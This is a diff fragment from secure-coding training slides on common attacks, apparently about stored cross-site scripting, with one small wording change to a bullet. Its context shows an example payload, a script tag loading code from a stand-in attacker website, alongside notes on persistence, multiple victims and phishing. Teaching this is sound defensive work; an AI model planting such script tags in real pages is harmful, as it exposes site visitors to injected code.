elephantscale/es-training-new/secure-coding/slides/Common-Attacks.md

 <script>http://attackerwebsite.com/maliciousscript.js</script>
 ```

-- When a victim goes to the page containing the comment, the payload in the comment executes
+- When a victim loads the page containing the comment, the payload in the comment executes
 - The attack payload remains in persistent storage on the server
 - Multiple users may become victims of the attack
 - Phishing is used to deceptively direct victims to the URL containing the payload